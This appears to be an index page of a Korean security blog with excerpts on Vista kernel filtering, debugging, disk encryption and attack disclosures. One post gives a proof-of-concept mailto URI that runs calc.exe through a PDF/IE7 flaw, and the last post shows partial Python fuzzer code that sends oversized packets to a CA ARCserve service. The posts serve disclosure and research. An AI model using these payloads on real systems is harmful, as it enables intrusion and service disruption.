Windows Vista SP1의 Object Manager Filtering으로 할 수 있는 일

윈도우즈 비스타 SP1에 새롭게 탑재될 Object Manager Filtering을 통해서 기본적으로 프로세스간의 상호 작용을 컨트롤 할 수 있다. 윈도우즈의 한 특징이 바로 한 프로세스가 다른 프로세스를 열거나(OpenProcess) 핸들을 복사해 올 수 있다는 것이다. 이러한 과정에서 비스타(Vista) 이전에는 권한만 있다면 아무러한 제약이 없었다. 하지만 비스타에 들어서는 아무리 권한이 많은 프로세스라도 다른 프로세스를 함부로 건드리지 못하도록 할 수 … Continue reading Windows Vista SP1의 Object Manager Filtering으로 할 수 있는 일

Windows Vista SP1의 Object Manager Filtering

Object Manager Filter를 코딩하여 빌드한 후에 윈도우즈 비스타(Vista) SP1시스템에 올려 보면 대부분의 경우 ObRegisterCallbacks 함수가 STATUS_ACCESS_DENIED(0C0000022h)를 리턴하고 콜백을 등록하지 못하는 현상을 경험할 때가 있다. 이 경우는 바로 링커 옵션의 문제로서 Kernel Data and Filtering Support for Windows Server 2008 문서의 4장(Requirements and Constraints)에 보면 다음과 같이 링커의 옵션("/integritycheck")을 넣으라는 구절이 나온다. All ISV kernel and … Continue reading Windows Vista SP1의 Object Manager Filtering

윈도우즈 비스타(Vista) 커널 자료 구조 정리 사이트

Windows Vista에서 사용되는 커널 스트럭쳐들을 모아 놓았다. Ntdll.dll에 대한 마이크로소프트의 심볼 파일, pdb 파일에서 추출해서 생성하였다고 한다. 32비트 비스타(Vista)를 기준으로 생성 되어 있으며, 좋은 점은 스트럭쳐의 멤버의 타입에 대한 하이퍼 링크가 모두 생성되어 있어서 커널 자료 구조 사이의 연관 관계를 파악하기에 유용하다는 것이다. 한가지 아쉬운 것은 자료 구조의 내용에 대한 설명이 전혀 없다는 것이다. 이것은 … Continue reading 윈도우즈 비스타(Vista) 커널 자료 구조 정리 사이트

Windows Vista Kernel Remote Debugging 팁들(Tips)

Vmware에서 윈도우즈를 리모트 디버깅하기 위한 방법은 Lord Of Ring0: Driver Debugging with WinDbg and VMWare에서 소개 되었다. 필자도 해당 방법을 통해서 드라이버 개발과 디버깅 시에 많은 수고를 덜어 왔다. 하지만 몇달전 Vista에서 드라이버 개발을 처음 시작할 때에 가장 황당했던 것이 리모트 디버깅의 세팅이었다. 간단하게 boot.ini에서 다음 스트링을 추가해 주면 되었던 것이 복잡한 명령어들을 사용하도록 바뀐 … Continue reading Windows Vista Kernel Remote Debugging 팁들(Tips)

민감한 파일을 안전하게 – 디스크암호화 유틸리티: TrueCrypt

종이를 대체하여 모든 것이 전자 문서로 저장되어 있는 지금, 회사에서 업무상이나 개인적으로 민감한 파일들이 많은 요즘이다. 많은 문서들이 유출되고 있는 이 때(FBI loses laptops with classified information)에 민감한 파일을 안전한게 저장하는 방법 중의 하나가 가상 디스크를 이용하는 것이다. 많은 가상 디스크 유틸리티들이 있지만 그 중에 안정적이면서 무료이면서 오픈소스인 툴이 바로 "TrueCrypt"이다. http://www.truecrypt.org/ 2004년 2월 1.0 … Continue reading 민감한 파일을 안전하게 – 디스크암호화 유틸리티: TrueCrypt

Adobe pdf 파일을 이용한 해킹(hacking)에 대한 패치

 주위에서 이미 pdf 파일을 이용한 공격으로 피해를 당하는 사람들이 늘고 있다.해당 파일을 실행하면 Adobe pdf 파일의 메일 링크를 열지 않도록 한다.아직까지 IE7 패치가 나오지 않은 이상 간단하지만 강력한 보안 책이다. 공격은 첨부된 pdf 파일을 단지 더블 클릭하면 실행되고, 임시 파일에 ftp 명령어를 써 넣은뒤 cmd.exe를 통해서 실행 시키는 방식이다. 해당 reg 파일을 통한 패치는 adobe … Continue reading Adobe pdf 파일을 이용한 해킹(hacking)에 대한 패치

무선 랜 해킹 지도를 그리자

불과 몇 년 전까지만 해도 인터넷에 연결하려면 제법 요란한 다이얼 소리를 들어야 했다. 그에 비하면 요즘의 무선 인터넷 광고는 기술의 폭주를 새삼 실감하게 한다. 무선 인터넷의 보급은 거추장스러운 케이블을 치우는 데 일조했지만 사용자들을 그 이전 시기에는 미처 생각지도 못했던 잠재적 위험에 노출시키기도 했다. 무협지에서 검 하나로 강호를 평정하는 황당무계한 이야기가 현실에서는 이동형 장비 하나로 네트워크를 … Continue reading 무선 랜 해킹 지도를 그리자

인터넷 개인 정보 뒷조사 도구-말티고(Maltego)

 2007년 블랙햇에서 잠시 소개 되었던 Paterva라는 툴이 Maltego라는 이름으로 다시 나왔다.GUI와 웹인터페이스 버전이 존재하는데 GUI는 다음과 같은 모습을 띄고 있다.하지만 현제 GUI 버전은 잠시 중지 된 듯하다. 잠시 사용해 보니 검색 기능이 너무 강력하다 못해 위험한 수준이다. 오용되면 상당한 문제를 일으킬 만한 툴이다. http://www.paterva.com/web/Maltego/

PDF 잘못된 URI 설정을 사용한 공격: PDF 파일 함부로 열지 말자

문서 교환을 위해 자주 사용되는 pdf 파일을 이용한 취약점이 발견되었다. 원리는 간단하게 다음과 같다. pdf에서 mailto 태그를 처리하는 루틴에서 %를 사용하여 명령이 escape되는 것 때문입니다. mailto:test%../../../../windows/system32/calc.exe".cmd 취약한 대상은 다음과 같다. Windows Server 2003 and Windows XP with Internet Explorer 7 installed Adobe 제품군 뿐만 아니라 Firefox,Outlook,Outlook Express,Netscape 웹브라우저,Skype까지 이 공격에 취약하다고 한다. 근본적인 문제는 IE7에 … Continue reading PDF 잘못된 URI 설정을 사용한 공격: PDF 파일 함부로 열지 말자

Multiple Vulnerabilities in CA ARCserve for Laptops & Desktops

아주 오래전 우연히 발견한 버그...http://research.eeye.com/html/advisories/published/AD20070920.html거의 일년이 다되어서 포스팅 된듯하다.간단히 퍼저를 만들어 보자면 다음과 같다.#CA BrightStor LGServer.exe Fuzzerimport osimport sysimport socketimport reimport time def MakeCommandStr(command,arguments):  body=command  for argument in arguments:   body+="~~"+str(argument)  return "%.10d"%len(body)+body def FuzzyCommand(target,command_info): debug=2 sockAddr = (target, 1900) tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) tsock.settimeout(3) tsock.connect(sockAddr) packets=[] packets.append(MakeCommandStr(command_info[0],["A"*3000])) for packet in packets:  if debug>0:   print "="*80   print "Sending: ",packet  tsock.send(packet)  response = tsock.recv(1024)  if … Continue reading Multiple Vulnerabilities in CA ARCserve for Laptops & Desktops